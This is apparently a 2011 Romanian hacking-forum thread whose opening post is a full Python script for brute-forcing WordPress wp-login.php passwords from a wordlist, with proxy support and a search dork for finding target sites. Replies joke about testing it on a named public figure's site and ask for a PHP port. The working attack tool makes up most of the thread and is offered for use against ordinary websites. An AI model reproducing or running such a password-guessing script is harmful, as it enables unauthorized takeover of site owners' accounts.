PuRiCeL Posted February 20, 2011 Report Posted February 20, 2011 #!/usr/bin/python#WordPress Brute Force (wp-login.php)#If cookies enabled brute force will not work (yet)#Change response on line 97 if needed. (language)#Dork: inurl:wp-login.php#ilegalbrain#priv8import urllib2, sys, re, urllib, httplib, socketprint "\n priv8 scann"print "----------------------------------------------"if len(sys.argv) not in [4,5,6,7]: print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n" print "\t -p/-proxy <host:port> : Add proxy support" print "\t -v/-verbose : Verbose Mode\n" sys.exit(1)for arg in sys.argv[1:]: if arg.lower() == "-p" or arg.lower() == "-proxy": proxy = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1try: if proxy: print "\n * Testing Proxy..." h2 = httplib.HTTPConnection(proxy) h2.connect() print " * Proxy:",proxyexcept(socket.timeout): print "\n[-] Proxy Timed Out" proxy = 0 passexcept(NameError): print "\n[-] Proxy Not Given" proxy = 0 passexcept: print "\n[-] Proxy Failed" proxy = 0 passtry: if verbose == 1: print " * Verbose Mode On\n"except(NameError): print "[-] Verbose Mode Off\n" verbose = 0 passif sys.argv[1][:7] != "http://": host = "http://"+sys.argv[1]else: host = sys.argv[1]print " * BruteForcing:",hostprint " * User:",sys.argv[2]try: words = open(sys.argv[3], "r").readlines() print " * Words Loaded:",len(words),"\n"except(IOError): print "[-] Error: Check your wordlist path\n" sys.exit(1)for word in words: word = word.replace("\r","").replace("\n","") login_form_seq = [ ('log', sys.argv[2]), ('pwd', word), ('rememberme', 'forever'), ('wp-submit', 'Login >>'), ('redirect_to', 'wp-admin/')] login_form_data = urllib.urlencode(login_form_seq) if proxy != 0: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) opener = urllib2.build_opener(proxy_handler) else: opener = urllib2.build_opener() try: site = opener.open(host, login_form_data).read() except(urllib2.URLError), msg: print msg site = "" pass if re.search("WordPress requires Cookies",site): print "[-] Failed: WordPress has cookies enabled\n" sys.exit(1) #Change this response if different. (language) if re.search("<strong>ERROR</strong>",site) and verbose == 1: print "[-] Login Failed:",word else: print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n" sys.exit(1)print "\n[-] Brute Complete\n" Quote
m0rphic Posted February 20, 2011 Report Posted February 20, 2011 Ar trebuie testat pe asta Mircea Badea Log In Quote
xpt1 Posted February 20, 2011 Report Posted February 20, 2011 Nu poti face o "traducere" in PHP?Am auzit ca seamana mult cele doua limbaje... Quote
totti93 Posted February 20, 2011 Report Posted February 20, 2011 @xpt1 Python si PHP sunt limbaje complet diferite Quote
pr00f Posted February 22, 2011 Report Posted February 22, 2011 Pacat ca exista plugin-uri contra bruteforcing-ului. Quote
xpt1 Posted February 26, 2011 Report Posted February 26, 2011 Da, dar pentru cine nu foloseste...Oricum, daca cineva poate, il/o rog sa faca o traducere a codului din python in php. Quote
xpt1 Posted February 26, 2011 Report Posted February 26, 2011 Am eu... un generator de liste... aici.Acum puteti sa faceti o traducere in php? Quote